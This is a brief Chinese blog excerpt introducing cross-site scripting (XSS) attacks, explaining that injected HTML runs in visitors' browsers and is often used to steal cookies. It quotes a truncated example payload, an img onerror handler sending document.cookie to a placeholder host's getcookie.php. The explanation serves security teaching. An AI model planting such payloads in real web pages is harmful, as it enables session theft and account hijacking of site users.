无处不在的xss攻击
摘要:
XSS(Cross Site Script)跨站脚本攻击。是指攻击者向被攻击Web 页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的HTML代码会被执行,从而达到攻击的特殊目的。常见的有:盗取cookie。最简单的比如提交一个图片"<img src="x" onerror="window.open(http://xxx.com/getcookie.php?c='+document.... 阅读全文
posted @ 2010-03-01 16:00 nozer0 阅读(492) 评论(0) 推荐(0) 编辑